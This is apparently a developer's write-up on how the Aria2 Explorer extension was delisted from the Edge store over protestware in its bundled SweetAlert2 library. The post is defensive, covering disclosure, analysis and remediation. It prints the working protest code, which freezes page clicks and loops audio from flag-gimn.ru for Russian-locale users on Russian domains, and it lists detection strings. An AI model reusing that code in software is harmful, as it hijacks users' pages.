Summary: In August 2025, a user notified us via GitHub that Aria2 Explorer had been suddenly removed from the Microsoft Edge Add-ons Store and flagged as “containing malware.” We spent six months communicating with Microsoft and making repeated code changes, all without result. It wasn’t until March 2026, with the help of AI, that a systematic scan of all URLs and domains in our codebase revealed a suspicious domain — flag-gimn.ru — which led us to a piece of protest code deliberately injected into the third-party library SweetAlert2 by its author during the Russia-Ukraine war — code that, inside our extension, could never actually be triggered. This is our full account.
I. What Happened
On August 8, 2025, multiple users filed GitHub Issues informing us that Aria2 Explorer had been removed from the Microsoft Edge Add-ons Store.
Microsoft’s stated reason:
The extension contains or enables malware/PUA.
Aria2 Explorer is an open-source browser extension that exports download tasks to Aria2 for management. Our code is fully public on GitHub, we have over 100,000 active users, and we have been maintaining the project for eight years. We have turned down countless advertising deals and acquisition offers — our only goal has ever been to build a clean, reliable download tool. Being labeled as “containing malware” was equal parts absurd and darkly funny.
We immediately reached out to the Microsoft Edge Extensions team through their official GitHub and via email. Their responses were consistently vague. Only once did they mention that “suspicious domains were found,” without ever specifying which domain, which code, or which file. All other replies repeated only that we had “violated developer policies by containing malware.” With no concrete leads, we had no choice but to start guessing — and guessing wrong, as it turned out.
II. Six Months of Looking in the Wrong Place
The investigation unfolded in two phases.
Phase One (August–September 2025, approximately one month): With no specific guidance from Microsoft, and no way to pinpoint which change had triggered the removal, we naturally focused on the extension’s core functionality — intercepting and forwarding browser download tasks. This involves sensitive permissions like cookies, downloads, and scripting, which seemed the most likely candidates to trigger a security review.
We systematically removed or reworked every module that seemed potentially problematic:
- aria2:// custom protocol: used to launch a local application to open the download directory; behavior pattern too sensitive, removed
- Built-in blog: concerned about external links in the content, removed
- Click-detection content script: intercepting user clicks could be misread as tracking behavior, removed
- Version check request: periodic fetch to an external URL, removed
- Permission adjustments: attempted to make cookies an optional permission, trimmed host permissions…
Each submission was rejected with the same unchanged reason. Over the course of five or six attempts, we were operating entirely in the dark, and this phase ended without result.
Phase Two (March 2026): Months later, on a whim, we started discussing the problem with an AI assistant. At the AI’s prompting, we ran a full-text scan of all URLs and domains across our entire build output. Within days, we had found the real root cause.
We had been looking in the wrong place from the very beginning.
III. The Truth: A Piece of Protest Code Hidden in SweetAlert2
The scan surfaced a domain we had never noticed before:
flag-gimn.ru
Searching this domain led us to the open-source JavaScript library SweetAlert2, where we found that its GitHub repository was already full of issues discussing exactly this:
- https://github.com/sweetalert2/sweetalert2/issues/2561
- https://github.com/sweetalert2/sweetalert2/issues/2590
The culprit was the following code:
```javascript
if (
  typeof window !== 'undefined' &&
  /^ru\b/.test(navigator.language) &&
  location.host.match(/\.(ru|su|xn--p1ai)$/)
) {
  const now = new Date()
  const initiationDate = localStorage.getItem('swal-initiation')
  if (!initiationDate) {
    localStorage.setItem('swal-initiation', `${now}`)
  } else if (
    (now.getTime() - Date.parse(initiationDate)) / (1000 * 60 * 60 * 24) > 3
  ) {
    setTimeout(() => {
      document.body.style.pointerEvents = 'none'
      const ukrainianAnthem = document.createElement('audio')
      ukrainianAnthem.src =
        'https://flag-gimn.ru/wp-content/uploads/2021/09/Ukraina.mp3'
      ukrainianAnthem.loop = true
      document.body.appendChild(ukrainianAnthem)
      setTimeout(() => {
        ukrainianAnthem.play().catch(() => {})
      }, 2500)
    }, 500)
  }
}
```
The logic: detect if the user’s language is Russian and the domain is a Russian TLD (.ru / .su / .xn--p1ai); if so, after three days — disable all click interactions on the page and force-play the Ukrainian national anthem loaded from flag-gimn.ru on a loop.
From any security scanner’s perspective, this code is a textbook example of malicious behavior: page hijacking, loading external resources, connecting to a suspicious domain, and a hidden time-delayed trigger. flag-gimn.ru was exactly the “suspicious domain” Microsoft had been referring to all along.
It is worth noting: this code could never actually be triggered inside our extension. Extensions run in a browser context where location.host reflects the extension’s own origin, which can never match a .ru domain. We were collateral damage — flagged not for anything we did, but simply for carrying the code.
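To make the reachability argument concrete, here is an added example (not code from SweetAlert2 or Aria2 Explorer) that reproduces only the gating condition of the snippet above, with no payload, and evaluates it for several page contexts. The two regexes and the three-day arithmetic are copied from the snippet; a Map stands in for localStorage, the dates and page URLs are constructed, and the extension ID is a placeholder. The extension-page case shows the point made above: on a popup or options page, location.host is the extension ID, so the TLD test fails and nothing is ever stored. Note that this applies to extension pages; a content script injected into a web page sees that page’s location.host instead, so the same check is worth running for whichever context actually executes a bundled library.

```javascript
// Added example: the gate of the SweetAlert2 protest code, separated from its
// payload, used to check in which page contexts the payload would be reachable.
// Not SweetAlert2's or Aria2 Explorer's code; regexes and day arithmetic mirror
// the quoted snippet, and a Map stands in for localStorage.

const RU_LANGUAGE = /^ru\b/;               // navigator.language test from the snippet
const RU_TLD_HOST = /\.(ru|su|xn--p1ai)$/; // location.host test from the snippet
const DAYS_BEFORE_FIRING = 3;
const STORE_KEY = 'swal-initiation';

// One evaluation of the gate, as the library would run it on page load. Returns:
//   'not-matched'    language or host test fails; nothing stored, payload unreachable
//   'armed-waiting'  both tests pass; first-seen timestamp stored, payload not yet due
//   'would-fire'     both tests pass and more than 3 days have passed since first-seen
function assessProtestwareGate({ language, pageUrl, store, now }) {
  const host = new URL(pageUrl).host; // what location.host holds on that page
  if (!RU_LANGUAGE.test(language) || !RU_TLD_HOST.test(host)) {
    return 'not-matched';
  }
  const initiation = store.get(STORE_KEY);
  if (initiation === undefined) {
    store.set(STORE_KEY, String(now)); // the snippet stores `${now}`
    return 'armed-waiting';
  }
  const elapsedDays = (now.getTime() - Date.parse(initiation)) / (1000 * 60 * 60 * 24);
  return elapsedDays > DAYS_BEFORE_FIRING ? 'would-fire' : 'armed-waiting';
}

// Two page loads `daysApart` days apart in the same context, sharing one store.
function runScenario(context, daysApart) {
  const store = new Map();
  const first = new Date('2026-03-01T00:00:00Z'); // constructed date
  const second = new Date(first.getTime() + daysApart * 24 * 60 * 60 * 1000);
  return [
    assessProtestwareGate({ ...context, store, now: first }),
    assessProtestwareGate({ ...context, store, now: second }),
  ];
}

// Constructed contexts; the extension ID is a placeholder, not a real one.
const CONTEXTS = {
  extensionPopup:  { language: 'ru-RU', pageUrl: 'chrome-extension://abcdefghijklmnopabcdefghijklmnop/popup.html' },
  ruSiteRuLocale:  { language: 'ru-RU', pageUrl: 'https://example.ru/' },
  ruSiteEnLocale:  { language: 'en-US', pageUrl: 'https://example.ru/' },
  comSiteRuLocale: { language: 'ru',    pageUrl: 'https://example.com/' },
};

for (const [name, context] of Object.entries(CONTEXTS)) {
  console.log(name.padEnd(16), runScenario(context, 10).join(' -> '));
}
```

Only the Russian-locale visit to a .ru host ever advances past the first check; every other row, including the extension popup, stays at not-matched on both loads. That is the gap a static scanner cannot see: it matches the strings and the structure, not whether the condition can hold in the code’s actual origin.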
We had not initially focused on the frontend UI code because other Edge extensions that also bundle AriaNg had not been removed. To be clear: this has nothing to do with the AriaNg project itself. The issue arose from our own decision to upgrade certain components during a customization effort.
Once we identified the root cause, we used AI to rewrite all SweetAlert2 usage in the project from scratch — the entire replacement took about 20 minutes. The result looks identical, with a few small visual improvements (we’re rather pleased with it 😏). The code is now fully under our control, with no dependency that can silently change in a future update. In a way, that felt like a fitting epilogue to this whole ordeal.
IV. Background: This Was Not a Bug. It Was a Choice.
SweetAlert2 is one of the most widely used open-source JavaScript dialog libraries, with npm weekly downloads approaching one million. That is precisely why we never audited it — no one audits a mature, well-starred library they have been using for years.
This code was not injected by a third party. It was added by SweetAlert2’s own author, limonte, in response to the Russia-Ukraine war.
- March 2022: The author added this code to SweetAlert2. It started as an anti-war popup, then escalated to disabling page interaction and force-playing the Ukrainian national anthem. Commit: 7de8f7af
- November 2022: Community developers discovered it and filed GitHub Issue #2552, describing the behavior as “something that could almost be considered malware.” The author chose to keep it.
- July 2023: Popular password manager Bitwarden was found to indirectly include this code; pages would lock up completely in Russian-language environments. GitHub Issue #5734
- September 2024: We introduced SweetAlert2 while customizing and upgrading our AriaNg integration, unknowingly pulling in code that had been sitting there for over two years.
- August 2025: The issue came to a head, likely because a security scanner updated its signature database. The Chrome Web Store and Microsoft Edge Add-ons Store flagged affected extensions at nearly the same time. Aria2 Explorer was removed from the Edge store.
- August 14, 2025: The author removed the code in v11.22.4 via PR #2847. The direct trigger was a developer filing GitHub Issue #2846 reporting a Chrome Web Store rejection.
This Was, in Fact, a Collective Movement of 2022
In March 2022—weeks after the Russian military invasion of Ukraine began—the npm ecosystem witnessed a massive outbreak of “protestware.” A host of popular libraries—including node-ipc, es5-ext, styled-components, and event-source-polyfill—were successively injected with protest-related code.
The severity of the resulting harm varied drastically: node-ipc, for instance, directly executed file-deletion operations on the machines of developers suspected to be located in Russia or Belarus, effectively functioning as malware; libraries such as es5-ext and styled-components, conversely, merely displayed text messages and were relatively benign.
SweetAlert2 took a third path: hijacking the web page at runtime and loading an external resource. The potential harm sits somewhere between the two extremes above, but this particular behavior is precisely the kind most likely to trigger security alerts during application store scans.
V. Two Stores, Two Approaches
Same code, same scanner, two very different responses.
The Google Chrome Team chose to give us a pass. Possibly because the code could never actually fire within our extension, they kept it live rather than pull it — which, honestly, may have saved us from an even bigger mess, or at the very least might have forced us to find the problem sooner 😅.
The Microsoft Edge Team, over six months of communication across multiple channels, only once provided the vague information that “suspicious domains were found,” and otherwise declined to offer any actionable specifics. For an independent developer without access to commercial code-scanning tools, that is functionally useless. Perhaps the details were too sensitive to share — we genuinely don’t know.
The contrast with the Chrome team is telling. As visible in GitHub Issue #2846, the Chrome team gave developers the specific keyword “Ukraine anthem” to aid their investigation — a small detail that makes an enormous practical difference.
We have no interest in judging either company. But the difference in approach produced very different outcomes: one developer community continued to be served without interruption, or was at least able to locate the problem faster; the other spent six months searching in the dark.
VI. A Closing Thought
We understand the anger that comes with war. We understand the impulse to use whatever platform you have to make a statement.
But there are many ways to express a political position. This should not be one of them.
Open-source code is a shared intellectual commons, built on trust between developers across the world. Injecting a hidden political payload into a library that millions of projects depend on does not hurt any government or institution. The ones left holding the bill are developers like us, who had no idea it was there, and the users who rely on what we build.
This code existed for three years. How many developers were affected during that time? No one has a complete count. And for those without access to professional scanning tools, some may still not know.
The world is becoming more unstable, not less. That is precisely why we need more reason and restraint in how we handle conflict — not more chaos injected into infrastructure that everyone depends on.
VII. If This Has Happened to You
If your extension has been removed or rejected from the Edge Add-ons Store for “suspicious domain” or “malware/PUA” and you cannot figure out why, search your build output for:
"flag-gimn.ru"
"Ukraina.mp3"
If you use SweetAlert2, verify that your version is v11.22.4 or later. The affected range is v11.4.9 through v11.22.3. Versions v11.4.9 through v11.6.13 contained the code with no documentation whatsoever. Versions v11.0.0 through v11.4.8 are not affected.
Also note: this code spread into 28 or more other npm packages. Even if you do not use SweetAlert2 directly, it is worth auditing your dependency tree.
Additionally, GitHub itself features security scanning capabilities; we recommend that all developers enable Dependabot alerts to ensure supply chain security.
VIII. The Final Hurdles
This article was actually completed in late March, pending only the moment Aria2 Explorer was relisted on the Edge Add-ons store. Regrettably, Microsoft put us through the wringer for yet another month. We assumed that simply removing the malicious code would be enough to get the extension relisted; however, it was rejected once again. We then attempted various modifications, but even after three resubmissions, it continued to be rejected. Ultimately, we had no choice but to abandon the original extension ID and submit it as a brand-new listing before it finally passed review and was relisted. Throughout this entire process, Microsoft provided absolutely no notifications or documentation to inform us that once an extension is delisted due to malicious code, it can never be restored to its original listing. Just like that, another month was wasted and both the user count and comments have been reset to zero.🤦♂️
Finally
Aria2 Explorer is relisted and fully available on the Microsoft Edge Add-ons Store. Thank you to everyone who stayed with us through this.
Postscript
Even while our extension was flagged as “containing malware” and completely unavailable through the Edge store, we still had over 6,000 users somehow keeping it running. We have no idea how they managed it — if you are one of them, we are genuinely curious how you made it work. Leave a comment and let us know. 😀

Author: Alex Hua
Repository: github.com/alexhua/Aria2-Explorer
Website: aria2e.com